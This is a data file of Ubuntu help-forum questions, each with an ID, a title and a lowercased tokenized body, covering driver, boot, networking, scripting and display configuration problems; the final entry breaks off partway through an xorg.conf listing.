367787	ubuntu 12.04 cuda problems ?	i 'm new to the whole ubuntu/linux world , however recently i 'm been testing about the ability of cuda enabled gpus as a possible replacement for an expensive cpu , specifically i 'm run a geforce gt640 . the aim of this computer is to perform sequence alignments of dna looking for common sequences using a program call meme , or the cuda version cuda-meme . now i 'm no expert and everything i know about ubuntu/cuda/meme is self taught , i 've successful got meme to run , and i 've ran some of the examples that come with the tool kit showing that ( i hope ) i 've got cuda to work . now when i run cuda-meme it complies the sequences into a table ( both meme and cuda-meme ) do this , then in cuda case it shunts the data into the gpu , and go through the alignment picking one sequencing ad finding everything that matches it , and then repeats once it gets to the end . now it aligns the first few sequences and then puts this error : cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : invalid argument , function : pmemcpy2d line 229 in file cudagenericfunction.cu cuda error : unspecified launch failure , function ; pfree line 205 in file cudagenericfunction.cu cuda error : unspecified launch failure , function ; pfree line 205 in file cudagenericfunction.cu cuda error : unspecified launch failure , function ; pfree line 229 in file cudagenericfunction.cu memory allocatin failed ( in function : cuda_sequence_subseq7 line 521 ) i 've looked up pmemcpy2d but my understanding is well lacking to say the least , could anyone suggest and answer ? if you need any more info just let me know and possibly the command to bring up the required info
367789	how do i restore a lost grub boot option on ubuntu 12.04	ok , there are probably tons of questions asked related to myproblem but i 'm in a delicate situation so i do not dare to experiment ... background : i have installed and setup a ( ubuntu/windows7 ) dual boot on my corporate locked-down laptop , that is , first install windows7 using a corporate netboot image , let it finish , then boot ubuntu on a live usb and using gparted shrink the partition and install ubuntu in a new partition along with a swap partition ( linux hibernate w : o swap partition wont really fly ) . now this has to be done before checkpoint disk encryption is applied on the windows7 partition . everything was fine , i run ubuntu on daily basis and once in a while boot into windows7 to do mundane corporate tasks , it usually works fine with hibernate/resume into windows7 . this is irrelevant , but i need to get this rant of my chest i also do hibernate/resume into ubuntu and that works fine as well , except that sometimes the compiz window manager crashes and fails to be restarted , after a wake up from hibernate ( i think it 's an i915 driver issue according to google ) . in such a moment , when compiz had crashed and i needed to finish some work , i quickly installed and tested a couple of window managers ( twm , wmaker , xfce-4 ) to be able to keep working without rebooting . one of those fu**ing piece of s**t packages found it amusing to change the grub splash to a debian f***ing s**tlooking splash , `` la la la , i 'll just change the splash to make the world a better place and innocently run grub-update ... '' without ever f***ing ask me whether its okay to f*** around with my delicate but working dual boot environment ( requires two window7 boot attempts to get past the checkpoint disk encryption ) . this is relevant so on next reboot my option to run windows7 on boot was gone , i tried grub-install , grub-update but it was not able to restore the windows7 boot option . i can boot into linux w : o problem , but the options to boot windows7 is gone . so i started googling and felt horror build up since every solution i found kept mentioning windows7 repair cd , mbr restore , bla bla , not a f***ing option in a locked down corporate bootimage , i need to get it restored without a windows7 repair cd or whatever . now i 'm much more relieved since i managed to boot into windows7 using the grub cli by running the following commands : > chainloader ( hd0 , msdos1 ) +1 > boot so my question is how to get that back into my grub boot menu as the option to run windows7 ? the reason i 'm asking how to do this is that i 'm terrified to f**ck up and loose my ability to boot into windows7 , because restoring what i have ( had ) requires a lot of mundane work ( which includes calling to the outsourced help desk across the globe just to re-enable a network boot image for my laptop ) .
367790	add some class files in a config folder to my classpath	i know there is a lot of threads about setting classpath , but it 's getting more confused after reading various ways . i am using a java application called babelnet which can disambiguate word senses . in installation , it requires me to add a config folder which contains a bunch of configuration files such as *.properties and *.class into the classpath . and here is my effort : classpath=/home/babelnet-api/config export classpath but when i run my java codes , it always pops up the error that could not find the configuration file to start . could anyone give me some hints or any ideas about this problem ? in the `` read me '' file of babelnet , it actually gives me a sample command of how to add a class file to classpath , but i totally lost . here is the sample command : java -classpath bin : lib/* : config it.uniroma1.lcl.babelnet.babelnetdemo so , could anyone explain it briefly ? particularly , the part starts from config . many many thanks to the help in advance !
367791	ca n't complete matlab installing	i am student interested in ubuntu . ( or newbie coder ) i try to install matlab from `` ubuntu software center '' and , i see some dialog be written `` ca n't find installed matlab '' . so i close dialog while installing . ( it 's my mistake ) even if i turn off computer , when i turn on computer , it is not removed . i try to `` sudo apt-get remove matlab '' . but that occur error . ( occurred error : https : //bugs.launchpad.net/ubuntu/+source/debconf/+bug/349469 ) please help me .
367792	remote desktop connection problem	i am facing a problem while connecting to a virtual machine vm ( running ubuntu on it ) from my laptop ( running windows 7 on it ) . i am able to connect to vm using remote desktop . the problem is that sometimes when i remotely access the vm using rdt , it opens a new session instead of connecting to the previously opened session . therefore , when i tries to open some applications ( e.g . eclipse , firefox etc ) which are already running in the previously running session , i get an error that they are already running . i want to ask that does anyone has faced such a problem or how to solve it . regards , adnan
367793	apache 2.4.6 : client denied by server configuration ( php fpm )	i found a similar question but it did not helped . when i open a php file via https : //site/test.php , the following error comes : [ tue oct 29 11:15:53.480855 2013 ] [ authz_core : error ] [ pid 5424 ] [ client xxx.xxx.xxx.xxx : xxxxx ] ah01630 : client denied by server configuration : /vhost_site_ssl virtualhost : < virtualhost *:443 > servername site:443 serveralias www.site:443 documentroot /opt/web/site sslengine on sslcertificatefile /etc/apache2/ssl/privkey.pem errorlog `` /opt/log/apache/site_ssl-error.log '' customlog `` /opt/log/apache/site_ssl-access.log '' combined customlog `` /opt/log/apache/site_ssl-bandwidth.log '' common < directory /opt/web/site > allowoverride all options +indexes +followsymlinks +multiviews order allow , deny allow from all require all granted < /directory > < directory /vhost_site_ssl > allowoverride all order allow , deny allow from all require all granted options +indexes +followsymlinks +multiviews < /directory > < directory /php5-fpm-handler > allowoverride all order allow , deny allow from all require all granted options +indexes +followsymlinks +multiviews < /directory > < ifmodule mod_fastcgi.c > < filesmatch \.php $ > sethandler php-script < /filesmatch > action php-script /php5-fpm-handler alias /php5-fpm-handler /vhost_site_ssl fastcgiexternalserver /vhost_site_ssl -socket /var/run/sock_site_ssl.sock < /ifmodule > < /virtualhost > i suppose this error is caused by upgrading apache 2.2 to 2.4 . i also read this : http : //httpd.apache.org/docs/2.4/upgrading.html but did not helped .
367796	ati proprietary drivers for `` old '' devices	i have noticed that my ubuntu installation is quite sluggish and slow despite the fact that the hardware is not so old ( a dual core 2.40ghz cpu 4gb of ram and a mobility radeon hd 3650 graphic card ) i have strong evidence to suspect this is related to the fact that the recent releases of ubuntu use the os driver for this graphic card . hence i would like to install the proprietary driver as described here but it appears that the latest release of fglrx does not support my graphic card jernej @ darkstar : ~ $ sudo aticonfig -- initial [ sudo ] password for jernej : aticonfig : no supported adapters detected hence i am wondering - what would be the best way to install the proprietary driver in this case ? thanks
367797	ubuntu 13.10 - workspace switcher icon does n't indicate the workspace i 'm currently in	first of all , english is not my native language , so please bear with any mistakes i make . the title says pretty much all . the workspace switcher works fine so far , but the icon behaves as if i were still using 12.04 lts ; though i have 13.10 64-bit now . i googled this problem , but nothing were to be found for my particular minor problem , so i decided to ask ubuntu . = ) greetings from germany , an602
367798	install maperserver 6.4 from launchpad on ubuntu 12.04	iâ´ve a fresh ubuntu 12.04 lts server installation with lamp where i want to install cgi-mapserver . this works great with following terminal commands : sudo add-apt-repository ppa : ubuntugis/ubuntugis-unstable sudo apt-get install cgi-mapserver mapserver-bin this end in a running mapserver 6.0.1 version . so far so good , but i saw here https : //launchpad.net/ubuntu/+source/mapserver/6.4.0-2 is a package for mapserver 6.4 ! how can i tell ubuntu to use the 6.4 package from the link above to install instead of 6.0.1 ? thanks + with kind regards , tino
367799	how to add an icon to the ubuntu unity toolbar using .desktop file ?	i am very new in developing application under linux . i have a doubt regarding about the use of .desktop file to add an icon into the ubuntu unity toolbar . i have the following .desktop file : [ desktop entry ] type=application # exec=/usr/share/connectdataspace/appl/launcher.sh exec=/usr/share/xcloud/appl/launcher.sh type=application x-gnome-autostart-enabled=true # name [ en_us ] =connect data space name [ en_us ] =xcloud # name=connect data space name=xcloud comment [ en_us ] = comment= startupnotify=true onlyshowin=gnome ; unity ; # startupwmclass=connectdataspace startupwmclass=xcloud # icon=/usr/share/connectdataspace/img/icolauncher.png icon=/usr/share/xcloud/img/icolauncher.png my doubt is : what exactly represents the startupwmclass=xcloud field of this file ? tnx andrea
367801	which ubuntu image for samsung exynos 4412 quad core cortex-a9 ?	i hope you can help me even if the question might seem a little bit stupid ! : ( i have a tablet pc which has a samsung exynos 4412 quad core cortex-a9 cpu and i would like to install ubuntu on it . i would like to know if i can easily install 32-bit ubuntu 12.04.3 lts for desktop or if i have to install ubuntu omap4 desktop like described in this page : https : //wiki.ubuntu.com/arm/omapdesktopinstall can you give me any suggestion , please ? thank you very much !
367806	kubuntu vm fullscreen on win7 host	can not take advantage of my 1280x1024 display to have seamless or fullscreen of kubuntu vm . tried to install guest additions and reboot but still 1024x768 .
367807	ubuntu 12.04 with lxde shows no energy options	i am using ubuntu 12.04 on which i installed lxde by running sudo apt-get install lxde . i am currently using the lxde desktop . the problem is , that i ca n't find the energy settings . i need to prevent the computer from switching to standby or energy saving mode as i run a program while being away from the screen . does anybody know how to accomplish this ?
367810	workspace problem	i have very strange problem in my ubuntu system . say in my first workspace , i have three programs open . firefox , spreadsheet , and terminal . now if i 'm working on two tasks simultaneously , i would like all the stuff related to each task in two seperate workstation . when i move to another workspace , ( ctrl+altr+- > ) and if i click on firefox icon , it goes immediately to the first workspace and opens the firefox which i opened there . next to the icons of each program opened in my first workspace , i see a light white arrow that says it is open ( in 2nd ws ) . i do n't want it that way . i know i can go to second workspace and on firefox ico , i press open a new window . but i do n't want it that way . earlier i have worked on centos . centos did not have this problem at all . both the workspace i would like to seperate , just like i 'm using two computers at the same time . : ) any suggestions/solutions ? thanks , shilp
367812	fresh ubuntu 12.04 lts on windows 7 machine takes long time to start	i am new to ubuntu . i just installed 12.04 lts onto a second hard drive in my windows 7 machine . now when i start ubuntu it sits there flickering between a whole ream of console output and a screen with the single word `` ubuntuâ . the console output seems to be the same screenful of information continuously repeated . the flickering is almost fast enough to make the two displays appear to merge into one . it will keep doing this until i hit random keys on the keyboard ( the arrow keys ) ; once i let it go about 10 minutes and it still got nowhere until i hit some keys ; after that it took a couple of minutes to finally reach the login screen . i had briefly trialled ubuntu on another windows 7 machine and had a completely different experience than this one . most notably , instead of grub asking me which os to load ( on the other machine ) , i am seeing what appears to be the standard windows boot selection . the only differences between the two installations ( other than a couple of month 's passing of time ) is that the first one was a 32-bit machine installed via usb whereas this one is 64-bit and i installed from a dvd . it is not at all how i expected my experiment with ubuntu to go . does anyone have any suggestions for how i can make it start properly ?
367817	ralink 3290 not working again after upgrade to 13.10	when i installed ubuntu 13.04 , and 12.10 on my current computer i lost the ability to use the ralink 3290 wifi . i was able , in the past , to get it working by following the advice posted here . but after upgrading to 13.10 i am once again stuck without wifi and the normal solution is not working . here is the problem in more detail . i obtain the ralink 3290 driver from either the vendor or the dropbox folder as described , no problem . i extract the folder and make changes as described if needed . i run the 'make ' command , as the command is running i get several warnings and then when i try and 'make install ' i end up with error:2 here is the output when i run `` make '' and `` make install '' - http : //pastebin.com/jq8dd0pq clarification : my wifi is not totally non-fucntional , it can see the various wi-fi networks around me , and it tries to connect to my favorite ones , but it never fully connects . it then just cycles through the various wifi networks , never connecting .
367821	mobile broadband worked in 13.04 not working in 13.10	does anyone know why a sierra wireless usb mobile broadband modem would work perfectly in 13.04 but then stop working immediately after upgrading to 13.10 ?
367824	error when starting pinta : /usr/bin/pinta : 2 : exec : /usr/bin/mono : not found	im new to askubuntu , and started using linux only a few months ago . my problem is : my laptop ran out of battery and therefore shut down , at some point after i installed and ran pinta . when i turn it back on the disc check detected some errors regarding `` / '' folder and i picked option to try to fix all the errors . it took a few reboots untill ubuntu launched properly . i tried running pinta but there was no such program installed . i reinstalled it ( had to purge the broken installation before ) and i started getting this error /usr/bin/pinta : 2 : exec : /usr/bin/mono : not found anyone knows how to get pinta running again ? and even thought im nowhere close to being ubuntu specialist i suppose this issue is deeper than just being unable to run pinta . it would be awesome if someone could explain me how to remove all the effects the laptop sudden shut down could have on my ubuntu . thanks in advance marcin
367829	how do i update my fpc package ?	my ubuntu repos show fpc 2.4.x but i need to get 2.6.2 . how do i do this ? i do n't have pascal/lazarus right now . my os is 12.04
367832	alps pointing device is not working properly in ubuntu 13.10	after installing 13.10 on sony vaio vpceh25en i found vertical scroll is not working . also mouse pointer not working reliably . please someone help me in this issue . thanks
367838	compiling error while installing realtek rtl8111e in 64 bit 13.10 . `` config_x86_x32 enabled but no binutils support ''	i downloaded the linux drivers for my onboard rtl8111e ( mobo msi b75 pro3-m ) from the realtek site . the realtek driver has been updated 23/09/2013 , so i assume it can handle 64 bit ubuntu ( 13.10 in my case ) . it seems to be compatible with kernel 3.xx . i run autorun.sh as root but get the following error : âconfig_x86_x32 enabled but no binutils supportâ i did n't expect this error , as my os is 64 bit . does anybody know how to fix this ? kind regards , david .
367839	setting up lan ubuntu 13.04 and sharing files	my hardware is : * acer apsire labtop with ubuntu 13.04 * fujitsu siemens labtop with windows xp sp3 * a wireless router with 4 wired ports in addition * a wired router with 4 ports * crossed networkcable my wish is : make acer aspire labtop with ubuntu to be the hotspot - meaning i want to share files and desktops between ubuntu and windows xp , and i want windows xp to get connected to the internet through ubuntu ( i guess that is a bit more secure than going online directly with the winxp computer after the winxp updates ends in april 2014 . ) in addition i want to have a wlan for my workcomputer and my mobile devices . if there is possible to share files on the wlan between mobilephones/tablets and the computers it would be a bonus . i am not familiar with how to set up any of this on either os , so some detailed instrukctions is welcome . but i 'm familiar with computers and working with the terminal in ubuntu .
367846	how can i install older version of node-less	i need version 1.3.3 of node-less . i 've tried to force an older version using synaptic package manager , but no earlier versions are available . if i attempt to install less via npm , it results in conflicts with the system node , and the lessc command does n't work correctly . i 've been battling with this for a while now and it 's getting urgent for a project i 'm working on . any help would be greatly appreciated . i 'm on ubuntu 13.10 how can i install the older less ?
367848	how to add rhythmbox controls to sound menu in gnome-shell ?	i noticed that i can not close rhythmbox by clicking close from the window . checked this thread : checked this thread rhythmbox still plays songs after exit and tried disabling related plugins but this didnot solve this problem . then i wanted to stop music from the sound menu on the panel . but when on gnome , sound menu on the panel does not have rhythmbox shortcuts while on ubuntu or ubuntu 2d it has . how can i add rhythmbox to sound menu ?
367853	how to repair grub from backup ?	i have windows 8 and ubuntu 13.04 in dualboot . but the problem was that windows did n't boot when grub is set as primary bootloader in bios . when the windows efi partition was checked as primary , windows booted well . then i decided to fix it and installed boot-repair . first of all , i made the backup . then updated the grub . the update was successful . but then windows and ubuntu did n't boot at all . i 've repaired grub using live-usb . now i can boot ubuntu , but windows does n't boot . how can i restore boot partitions from boot-repair backup ( .zip file ) ?
367854	can not access host shared folder from kubuntu vm	kubuntu vm ready ; but unfortunately can not access the defined shared folder host system ( win7 ) on virtualbox . upon accessing root > media > sf_ dolphin gives error saying `` you do not have the permissions.. ''
367855	stop web integration to unity in ubuntu 13.10 ?	i do n't want webapps integration in ubuntu , so is there any way i can stop webapps integration to unity in ubuntu 13.10 os . thank you .
367857	limit login to one active session on a computer	we use multiple ubuntu ( 12.04 ) computers in our network which are authenticated with an active directory ( windows 2008 domain ) . we would now like to limit each ubuntu computer to 1 active x session . so any user that wants to login on a computer with already a logged-on user , get a message or something . is there a good way to achieve this ?
367860	ubuntu lts 12.04 shutting down issues	i assigned an encrypted folder on ubuntu 12.04 lts during the installation process , and ( i suppose it 's because of that ) when i try to shut it down it never really shuts down , it stays in 'shutting down mode ' . what should i do ?
367861	idle - unable to open raster file - : success	when attempting to print to a dymo labelwriter 450 , i get this error : idle - unable to open raster file - : success i can print a test page and from the command line , but not from any print dialog . any ideas ?
367862	incorrect internet time in ubuntu 13.10	i have ubuntu 13.10 set to use the time `` automatically from the internet '' ( whatever that means ) . however it is running 3 minutes slower than the actual time . how can i fix this permanently ? i thought the point of getting time from a time server is that the machine would sync on a reasonably regular basis ( perhaps once a minute , or even more frequently ) . i have the ntp service installed already .
367863	problem with script	when i going to watch video in toutube , some times it 's stop workni and tell me that a script does not work , and this is script that was stopped : https : //s.ytimg.com/yts/jsbin/html5player-vflkocfq2.js:382
367864	help request from first time linux user	i am not able to get started with ubuntu linux . i have downloaded the 883 mb file but the hurdle is the lap top does not detect the cr drive . i need a little detailed first steps to install ubuntu linux . the application is for a home us laptop . thanks in advance . d t
367867	hp deskjet 1050a does not print or scan in lubuntu ?	i have a hp deskjet 1050a all-in-one printer . but the problem with lubuntu 13.10 ( saucy salamender ) is that it does not have the plug and play printer drivers like the other ubuntu 's do . you can however add the hp deskjet 1050a all-in-one printer through the printer settings menu in lubuntu . it does then recognize the printer but it does not allow you to print or scan anything . so i then downloaded the driver for my printer from hp linux imaging and printing website . but i soon found out that you need to have the computer connected to the internet to install the required dependencies for the driver . someone then told me to download the ( saucy ) hplip printer driver from the ubuntu packages search website instead . the following is what i had downloaded from there : hplip_3.13.9-1_amd64.deb hplip-data_3.13.9-1_all.deb hplip-dbg_3.13.9-1_amd64.deb hplip-doc_3.13.9-1_all.deb hplip-gui_3.13.9-1_all.deb i then tried to install them one by one with the gdebi package installer in lubuntu but got the following error messages when trying to do it : error : dependency is not satisfiable : libmud0 ( = 3.13.9-1 ) when i tried to install the hplip_3.13.9-1_amd64.deb file . error : dependency is not satisfiable : hplip ( = 3.13.9-1 ) |printer-driver-hpcups ( = 3.13.9-1 ) |printer-driver-hpijs ( = 3.13.9-1 ) when i tried to install the hplip-dbg_3.13.9-1_amd64.deb file . error : dependency is not satisfiable : hplip ( > = 3.13.9-1 ) when i tried to install the hplip-gui_3.13.9-1_all.deb file . overall , can someone please help me with installing the correct drivers for my printer without an internet connection ?
367868	upgrade to 13.10 problems with flash	when i tried to upgrade to 13.10 from 13.04 , at one stage , the terminal asked for my password and it was related to flash plugin . i entered my password and for almost an hour nothing happened apparently . i had to install 13.10 from start using usb . what might be the cause of this problem ? will upgrade to future versions of ubuntu cause the same problem ?
367869	what is the cups administration url ?	i thought a google search would instantly provide me the answer . i am very surprised it did n't ! i had it stored in my browser ... i just typed `` cups '' and it brought the page to me ... but i 've cleared the history ... now i want to get there again .
367871	ubuntu 13.10 rhythmbox cant update	when i update the system it says update is broken and that i need to use apt-get install -f in terminal , so i did but it says i need to be root for that . sudo apt-get install -f returns this error : uitpakken van librhythmbox-core8 ( uit ... /librhythmbox-core8_3.0.1-1ubuntu2~ppa0_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/librhythmbox-core8_3.0.1-1ubuntu2~ppa0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/librhythmbox-core.so.8.0.0 ' , which is also in package librhythmbox-core7 3.0.1-0~13.10~ppa1 can some help me ?
367879	can i workaround an unrecognized display ?	i have an epson powerlite 8350 ; it 's not recognized on my laptop , which has an nvidia quadro 2000m and ubuntu 13.10 , so that the screen resolution is limited to 1024x768 . this happens with both the nouveau and the nvidia-319 drivers . in the bios , i 've configured the system to use only the discrete graphics , so i do n't have optimus-related problems . this is somewhat strange , because i remember that on 13.04 , the display was recognized . is there a way to workaround this problem , to have access to the full resolution ( 1920x1080 ) , also considering that i sometimes hotswap the display with another ( which is correctly recognized ) ?
367881	does swap file usage increase disk i/o and cpu load ?	someone brought to my attention that if an application is using swap file ( when system ram is very low ) it increases the disk i/0 and as a result of that , cpu use % and cpu load increases . is this true or was that guy completely off-track ?
367884	laptop does n't suspend when lid is closed	i have lts ubuntu 12.04 and when i close my lid the screen goes black but does n't suspend because i can feel it getting warmer as if it was processing something . when i open it back up after an hour , i can see that all my battery is drained .
367888	what would happen after i uninstall all my os using os-uninstaller ? will i be able to boot from usb or cd so that i can make a fresh install of an os ?	what would happen after i uninstall all the os using os-uninstaller ? for more information about os-uninstaller , you can visit the wiki and ubuntu forums will i be able to boot from usb or cd so that i can make a fresh install of an os ? i wish to do it before doing a fresh install of an os . thanks in advance !
367890	installing cuda sdk version 5.5.2 on ubuntu 12.10 failed with unable to locate the kernel source	i 'm unable to install cuda sdk version 5.5.2 on ubuntu 12.10 due to the reason unable to locate the kernel source . here is my uname-r details 3.5.0-17-generic and the command that i used to install is ./cuda_5.5.22_linux_32.run -- kernel-source-path /usr/src/linux-headers-3.5.0-17-generic . i got this error message : “the driver installation is unable to locate the kernel source . please make sure that the kernel source package are installed and setup correctly . if you know that the kernel source packages are installed and set up correctly , you may pass the location of the kernel source with the ‘–kernel-source-path’ flag . please advice . thanks
367892	ubuntu 13.10 x64 change keyboard distribution	i have this problem , i set the keyboard language in spanish international , but when i switch off the notebook an turn on again , the keyboard distribution change again . for example when i press double dots key , appears this symbol > any suggest ?
367894	installing latest gnome	i like gnome . i want to come back to ubuntu if i install gnome , will i get gnome 3.10 ? if it will install gnome 3.10 then tell me . so i can switch to ubuntu 13.10 and intall gnome 3.10 .
367896	alter mbr order of partitions after copying partitions to larger drive	i have a new 1tb laptop drive that i want to clone an existing drive to . the issue is that i want to reorder and resize the existing partitions . the existing partition table for the drive is device boot start end blocks id system /dev/sda1 2048 24578047 12288000 7 hpfs/ntfs/exfat 11gb ( former recovery partition of a windows drive ) /dev/sda2 * 24578048 216989695 96205824 7 hpfs/ntfs/exfat 92gb windows install partition /dev/sda3 216989955 863465471 323237758+ 7 hpfs/ntfs/exfat 308gb windows/linux universal storage /dev/sda4 863467518 976771071 56651777 f w95 ext 'd ( lba ) /dev/sda5 863467520 976771071 56651776 83 linux 55gb ubuntu partition i want to change the ordering to 2 x 110 gb for both windows and linux 1 x 25 gb for web server and development 1 x 684 gb for windows/linux universal storage . i can create these partitions and copy the corresponding partion over using dd if=/dev/sdax of=/dev/sdbx bs=4096 conv=notrunc , noerror but that leaves the mbr untouched . if i copy over the existing mbr , it will be invalid since the order of partitions is very different on the new drive . how can i resolve this issue ?
367899	how do i get external monitor working on 13.10 for geforce card	i have an msi-ge60 laptop that has a geforce gtx 765m video card from nvidia . it has an hdmi output that i have connected to a monitor . when i specify hdmi input on the monitor , it states that no hdmi signal was found . there is also an intel vga compatible controller card . i hooked up the vga to the monitor and it also could not find the vga signal . is there anything special i need to do on ubuntu to get this external monitor working ?
367905	what happened to the 'suspend ' and 'shut down ' commands ?	just upgraded to 13.10 and my handy 'suspend ' and 'shut down ' commands are gone ! that is , hitting alt to reveal the command menu , and typing in 'suspend ' or 'shut down ' does n't reveal anything ! thoughts ? thanks ! -m
367906	replication checking shell script error	i 'm trying to create a database replication checking script which checks master-master replication but i 'm getting error while executing it . here is the script # ! /bin/bash path=/usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin export path # server name server= '' test server '' # my sql username and password user=username password= '' password '' # maximum slave time delay delay= '' 60 '' # file path to store error and email the same log_file=/tmp/replicationcheck.txt # email settings subject= '' $ server replication error '' sender_name=testserver recipients= '' tarun @ example.com '' # mail alert function mailalert ( ) { sendmail -f $ sender_name -it < < end_message to : $ recipients subject : $ subject $ message_replication_error `/bin/cat $ log_file` end_message } # show slave status ( line i have edited later . ) show_slave_status= $ ( echo `` show slave status \g ; '' | mysql -u $ user -p $ password ) # getting list of queries in mysql $ show_slave_status | grep `` last_ '' > $ log_file # check if slave running $ show_slave_status | grep `` slave_io_running : no '' if [ `` $ ? '' -eq `` 0 '' ] ; then message_replication_error= '' $ server replication error please check . the slave_io_running state is no . '' mailalert exit 1 else $ show_slave_status | grep `` slave_io_running : connecting '' if [ `` $ ? '' -eq `` 0 '' ] ; then message_replication_error= '' $ server replication error please check . the slave_io_running state is connecting . '' mailalert exit 1 fi fi # check if replication delayed seconds_behind_master= $ show_slave_status | grep `` seconds_behind_master '' | awk -f '' : `` { ' print $ 2 ' } if [ `` $ seconds_behind_master '' -ge `` $ delay '' ] ; then message_replication_error= '' replication delayed by $ seconds_behind_master . '' mailalert else if [ `` $ seconds_behind_master '' = `` null '' ] ; then message_replication_error= '' $ server replication error please check . the seconds_behind_master state is null . '' mailalert fi fi this is the error message i 'm getting . tarun @ devenv : ~/desktop $ sh databasereplicationcheck.sh databasereplicationcheck.sh : 40 : databasereplicationcheck.sh : 60 : not found databasereplicationcheck.sh : 43 : databasereplicationcheck.sh : 60 : not found databasereplicationcheck.sh : 49 : databasereplicationcheck.sh : 60 : not found databasereplicationcheck.sh : 59 : [ : illegal number : please help .
367907	pulseaudio pacmd set-default-sink , does not seem to work	i would like to set-default-sink but when loading a player it keeps connecting to sink 0 . i am loading module and see that it is in sink 1 i am then calling pacmd set-default-sink 1 i see in the sound settings that the default sink changes accordingly . but when i play a file from vlc or any other player for that matter , it uses sink 0. pacmd move-sink-input 1 works . how do i force the player to use the default-sink ? thanks .
367910	re-enable touchpad on mouse unplugged	i 'm using touchpad-indicator to disable touchpad . option `` disable touchpad when mouse plugged '' seemed quite promising , but in reality does n't work as i would have expected . once mouse is plugged , it disables touchpad completely without any way to re-enable it other than changing indicator 's preferences ( hot key does n't work and `` enable touchpad '' in dropdown is grayed out ) . unplugging mouse does not re-enable the touchpad automatically , nor does the hot key work . is it possible to automatically disable touchpad when mouse is plugged and automatically enable it when it 's unplugged ?
367913	android tablet as second display	i have faced with issue . my use-case : i have - pc with ubuntu and android tablet , i need - the android tablet as second monitor , but connected by wi-fi . i was trying to do next : sudo apt-get install xserver-xorg-video-dummy x11vnc after that i 'm change the xorg.conf : section `` device '' identifier `` configured video device '' driver `` radeon '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection # dummy videocard section `` device '' identifier `` videocard0 '' driver `` dummy '' videoram 256000 endsection section `` monitor '' identifier `` monitor0 '' horizsync 10.0 - 300.0 vertrefresh 10.0 - 200.0 displaysize 300 200 # the following modeline is invalid ( calculator overflowed ) : # modeline `` 32000x32000 @ 0 '' -38917.43 32000 32032 -115848 -115816 32000 32775 32826 33601 modeline `` 16384x8192 @ 10 '' 2101.93 16384 16416 24400 24432 8192 8390 8403 8602 modeline `` 8192x4096 @ 10 '' 424.46 8192 8224 9832 9864 4096 4195 4202 4301 modeline `` 5120x3200 @ 10 '' 199.75 5120 5152 5904 5936 3200 3277 3283 3361 modeline `` 3840x2880 @ 10 '' 133.43 3840 3872 4376 4408 2880 2950 2955 3025 modeline `` 3840x2560 @ 10 '' 116.93 3840 3872 4312 4344 2560 2622 2627 2689 modeline `` 3840x2048 @ 10 '' 91.45 3840 3872 4216 4248 2048 2097 2101 2151 modeline `` 2048x2048 @ 10 '' 49.47 2048 2080 2264 2296 2048 2097 2101 2151 modeline `` 2560x1600 @ 10 '' 47.12 2560 2592 2768 2800 1600 1639 1642 1681 modeline `` 1920x1200 @ 10 '' 26.28 1920 1952 2048 2080 1200 1229 1231 1261 modeline `` 1920x1080 @ 10 '' 23.53 1920 1952 2040 2072 1080 1106 1108 1135 modeline `` 1680x1050 @ 10 '' 20.08 1680 1712 1784 1816 1050 1075 1077 1103 modeline `` 1600x900 @ 20 '' 33.92 1600 1632 1760 1792 900 921 924 946 modeline `` 1440x900 @ 20 '' 30.66 1440 1472 1584 1616 900 921 924 946 modeline `` 1360x768 @ 20 '' 24.49 1360 1392 1480 1512 768 786 789 807 # common resolutions for android devices ( both orientations ) : modeline `` 800x1280 @ 20 '' 25.89 800 832 928 960 1280 1310 1315 1345 modeline `` 1280x800 @ 20 '' 24.15 1280 1312 1400 1432 800 819 822 841 modeline `` 720x1280 @ 25 '' 30.22 720 752 864 896 1280 1309 1315 1345 modeline `` 1280x720 @ 25 '' 27.41 1280 1312 1416 1448 720 737 740 757 modeline `` 768x1024 @ 25 '' 24.93 768 800 888 920 1024 1047 1052 1076 modeline `` 1024x768 @ 25 '' 23.77 1024 1056 1144 1176 768 785 789 807 modeline `` 600x1024 @ 25 '' 19.90 600 632 704 736 1024 1047 1052 1076 modeline `` 1024x600 @ 25 '' 18.26 1024 1056 1120 1152 600 614 617 631 modeline `` 536x960 @ 25 '' 16.74 536 568 624 656 960 982 986 1009 modeline `` 960x536 @ 25 '' 15.23 960 992 1048 1080 536 548 551 563 modeline `` 600x800 @ 25 '' 15.17 600 632 688 720 800 818 822 841 modeline `` 800x600 @ 25 '' 14.50 800 832 880 912 600 614 617 631 modeline `` 480x854 @ 25 '' 13.34 480 512 560 592 854 873 877 897 modeline `` 848x480 @ 25 '' 12.09 848 880 920 952 480 491 493 505 modeline `` 480x800 @ 25 '' 12.43 480 512 552 584 800 818 822 841 modeline `` 800x480 @ 25 '' 11.46 800 832 872 904 480 491 493 505 modeline `` 320x480 @ 50 '' 10.73 320 352 392 424 480 490 494 505 modeline `` 480x320 @ 50 '' 9.79 480 512 544 576 320 327 330 337 modeline `` 240x400 @ 50 '' 6.96 240 272 296 328 400 408 412 421 modeline `` 400x240 @ 50 '' 6.17 400 432 448 480 240 245 247 253 modeline `` 240x320 @ 50 '' 5.47 240 272 288 320 320 327 330 337 modeline `` 320x240 @ 50 '' 5.10 320 352 368 400 240 245 247 253 # resolutions for android devices ( both orientations ) # minus the status bar # 38px status bar ( and width rounded up ) modeline `` 800x1242 @ 20 '' 25.03 800 832 920 952 1242 1271 1275 1305 modeline `` 1280x762 @ 20 '' 22.93 1280 1312 1392 1424 762 780 783 801 modeline `` 720x1242 @ 25 '' 29.20 720 752 856 888 1242 1271 1276 1305 modeline `` 1280x682 @ 25 '' 25.85 1280 1312 1408 1440 682 698 701 717 modeline `` 768x986 @ 25 '' 23.90 768 800 888 920 986 1009 1013 1036 modeline `` 1024x730 @ 25 '' 22.50 1024 1056 1136 1168 730 747 750 767 modeline `` 600x986 @ 25 '' 